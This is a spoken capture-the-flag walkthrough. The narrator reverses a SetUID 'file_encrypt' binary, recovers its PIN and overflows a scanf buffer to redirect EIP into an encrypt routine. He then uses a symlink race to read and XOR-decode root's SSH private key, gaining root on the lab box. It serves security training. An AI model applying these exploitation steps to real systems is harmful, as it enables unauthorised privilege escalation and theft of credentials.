get my disassembler here. And if I highlight this if then, it should highlight in the code where I'm at in this. Let's see, is this that? Yep. I don't know why it's not highlighting. Let's see. Windows decompiler. There we go. Now it's highlighting. There we go. And we have the disassembly on this compare line. So we want to break at 10B09. Now, we're not at like 10B here. If I look at this, AB4, if we go up, where is AB4? There should be here. So we see zeros 10, AB4, sub ESP24, sub ESP24. So this whole piece of the memory address doesn't matter. We just care about these, I think, 3 nibbles. I think that's what it's called. But if I break on the last 3 of this, so B09, we should break on this actual compare call. We could do x/x, I think, to examine, or x/I to examine the instruction. So if I do x/I and paste this, maybe I don't do a star. We can see the instruction at this address is definitely that compare. So I'm just going to continue. So we can enter a pin code. And now we're at the compare. EAX is probably going to be mine. So if I just print, we can do the whole thing. $EAX. We see 4D2. If I convert this into decimal, so echo this like this, we can see it's 1234, which is the pin code we had entered. So now we want to get this, EBP minus 0x10. So if I just print this, we get pointed to a memory address. If we examine it, maybe I don't do a star, we get the actual assigned value of -202,976,456. So if I just try to put this in the program, so /file encrypt, enter the pin, we actually pass. So I do IPSEC, it just says, thanks for checking. You can give feedback to developer. If I try this again, we put a invalid pin, it says wrong pin. So this isn't really that useful. It's just giving a name and we're not doing anything. So if we look at this, going back to this code, we're right here. We're just asking for a name and then returning to main, and main after check pin just goes to nothing. So if we look at this code, this is actually a buffer overflow. Even though like this scanf looks identical to this scanf, there's something different about it. This is just loading it into local 18, which is defined as an integer, which has a max length. So no matter what we do, it's going to convert it to an int, and that's not overflowable. However, on this second call to scanf, this is going to local 2c, and that has a size of 20. So this, we're now overloading it because we're putting data from the user into local 2C, which has a size of 20. So if we just go over 20, we overflow the buffer and get into the EIP register where we can direct the program anywhere we want. So let's begin. The first thing I want to do is save this pin code over to the side because I have a feeling I'm going to be copy and pasting it a lot. So let's just echo to print that out so we can easily copy. And then we can do GDB on file encrypt. And we want to break on main again. We can run it, continue. We enter the pin code. And then we want to Control C, so we can do pattern create 64 because we want to know exactly where we overwrite EIP. So I'm going to do continue again. We paste this and we crashed. And we crashed at 616161C, which is EIP. So if I just do now pattern offset to search for this, we can see it's at line or offset 44. So let's run this again. Put the pin code in. And then we want to print 44 A's. So Python 3-C, print A times 44. And we're going to put 4 B's after this to confirm we are writing where we think we are. So 4 B's, we crash it, and it stopped at 424242. EIP is at 4 B's. So this is really good for us. Now we have an EIP overwrite. We have to figure out exactly what we want to do. ROP is going to be the most likely thing. And then when I was initially looking at this program, there was a function here called Encrypt. And Encrypt looks like it can potentially read files. So the very first thing I want to do, do an LSLA. We can confirm this is a SetUID file. So when we execute it, it's running as the root user. Now the file itself does have Pi enabled, I believe. Is it check sec? There we go. On, what is the file name? File encrypt. Because it does have Pi, which will be like randomization of memory addresses. But we can check the actual host. So if I cat proc sys kernel randomize VA space, this is going to check if ASLR is on the system. And if ASLR is not on the system, the memory address is going to be the same every time we run it. So cat proc sys kernel randomize VI space. There we go. And it's set to 0. So ASLR is disabled. If this was 2, it would be on. Also, if it was 1, it would be on as well. But most times you see this being set to 2. If I cat it on my host, we can see it's set to 2 there. So ASLR is enabled. But since it's not enabled, we should be able to just call this encrypt function manually. So let's just go back into GB. Okay, we can break on main, run, print, encrypt. It is at this memory address. And that actually looks like it's all ASCII. Python 3-C, print. I think we just do \x like this. Yeah, that is an ASCII memory address. So we got lucky there. So we don't even have to do anything too fancy. So if we just do Python 3-C, print A times 44 plus this string, we should be able to get into the encrypt function. So let's test this out because we're overwriting EIP to point to encrypt. So if I just do file encrypt, enter the pin -202976456, put this, and we segfaulted. That is not what I expected. 44 plus VUX. Huh. Let's make sure this echo-n, because we may have done something wrong. wc-c 44. I mean, it could be like an endian thing. Maybe we should reverse this. So \x 58 5b 58 55 56. We can try it this way. XUV. I could have just done that manually, I guess. Print XUV like this. And we can try doing it this way to see what happens. If it doesn't, we'll probably have to step through this and a debugger to see what's happening. Negative 202.976.456. There we go. So that was it. We just had to change the endianness of it. And now it wants an input file. So let's look at exactly what this does. So it's declaring a lot of things up here. And then we do input file. So local 84. I'm going to call this in file. And then encrypted file. I'm guessing this is out. So I'll call that out file. Okay. So it's running stat against this. This ivar1 is going to be result. And it runs stat and make sure, well, this is the output of stat, I believe, this local 70. And it's checking if the UID is 0. If the UID is 0, it's going to say the file is owned by root and then exit. Else, it's going to sleep for 3 seconds and then open the file and probably encrypt it, right? Let's see, it does fopen, while true. Where is the encryption routine? Let's see, fopen, else while true, local 18. Oh, right here. So its encryption is just XORing it with the byte 9b. So this is the, I'm going to call it, I guess, in byte, or maybe we can call it just I. So it XORs that and then writes it to this, I believe. I don't know what that is. Maybe I should just rename out file to encrypt file because that's what they called it. But I think this is where it's writing to. Or maybe it's putting it as a pointer to then write. I don't know. But that looks like exactly what is happening. So we have a timing issue. Like, it's going to check it, and then it's going to sleep for 3 seconds. So while it sleeps, we can make that file now become a symlink somewhere. So then it opens a file we want. So I'm guessing like the, what is it? SSH key is what we want. So I'm going to SSH. Let's go here, SSH-I tester at 10.10.11.119. We need to specify the key. There we go. So I'm going to cd temp, and we're going to echo hello to temp. Or we'll do this, please subscribe. So if we LSLA, its SetUID is not root, so we should be able to use this as the input file, so please subscribe. And then temp, we'll call it encrypted out. And while we do that, I'm going to make sure I get my symbolic link right. So root.ssh id rsa to test. I just want to look at test, and test is now pointed there. So I did the symbolic link correctly. So we can just remove that. And we'll just replace this with please subscribe. And then I'm going to rm the actual file. So we're going to hit enter here, go down this pane, hit enter here to replace the file with the one we expect. So do this, do that, and we should get an encrypted out file. It does a seg fault here. I'm going to guess it crashed because like we clobbered like the base address, so it didn't know where to return to after this function. Because if I cat this file, we don't have it. Shoot. LSLA. We don't have anything. Well, that was unfortunate. I'm going to try it again real quick. So we do this. We enter the pin. Then the name. We do this. So we get into the encrypt function. Input file. Temp please subscribe. Encrypted file. I wonder if this file has to exist. Touch that file. And then let's remove, whoops, rm please subscribe, echo hello to please subscribe. And we want to copy this. Okay. So we'll do temp encrypted out. So let's try this again. Now we created that file. Maybe it doesn't do that. We've repointed it. It still crashed. If we look at encrypted out, size of 0. So we are missing something. We do this, and we're not getting to this exit, so I think we're good there. It's going to open in file, which is what we want. And it's also going to open out file with WB. Apologies for the sloppy cut. There was something really weird going on where this exploit just wasn't working in /temp. I cut out probably about like 15 to 20 minutes of just random troubleshooting that just ended nowhere. So I'm going to make the directory ipsec, and we're just going to work out of here. So I'm going to vi. I'm going to call this just exploit because I don't want to type the pin code every single time. So we can just do it this way. So put each thing we enter on a new line. So this will be temp ipsec input, and this is temp ipsec output. If we just write this, then we call the file encrypt and put temp ipsec exploit, it's going to send each of those lines here, and it'll just automate it so we don't have to type everything. So we want to create the directory input. So echo A to input, and then we can just do rm input ln-sf root.ssh id rsa to input. We don't do the directing, we just do space input. So now when we run this, we'll have 3 seconds to go down here and hit enter. So run, enter, and we should have an output file now here. If we look at it, less output, it looks like binary. It is a bunch of XOR data. So before people think I'm crazy, let's just v-exploit again, temp ipsec exploit, and I'm going to get rid of this ipsec directory. We'll just do input and output, right? So here we can echo A to input, rm input ln-sf root .ssh. Wait, what file did I just put? Did I put the IDRSA? Yep, I did. Root ssh IDRSA to input. So that is exactly what I did. Actually, to make sure we don't have any typos whatsoever, I can literally copy and paste this, right? So copy this, paste, and we'll have 3 seconds after we run this command. And again, if I cat temp ipsec exploit, that's what it looks like. So do this, and it's going to segfault, and we won't have an output. And I have no idea why we don't have output when we're just in /temp. But it works when we're in ipsec. Don't know why, but that is the case. So if I just base64 output, let's do base64-w0 output. We can copy it, and we can go to cyberchef. So gchq cyberchef, because it was just a straight XOR, I believe. So from base64, we have a bunch of stuff here. Let's go back to the code. It is XORing with 0x9b. So XOR key 9b, and boom, we have an SSH key. So we can copy it, v root, paste, chmod 600 root, sh-i root, root at 10, 10, 11, 119, I believe. And there we go. We are root at overflow. So not exactly sure what was going on there, but that is the box. Hope you guys enjoy it. Take care, and I will see you all next time.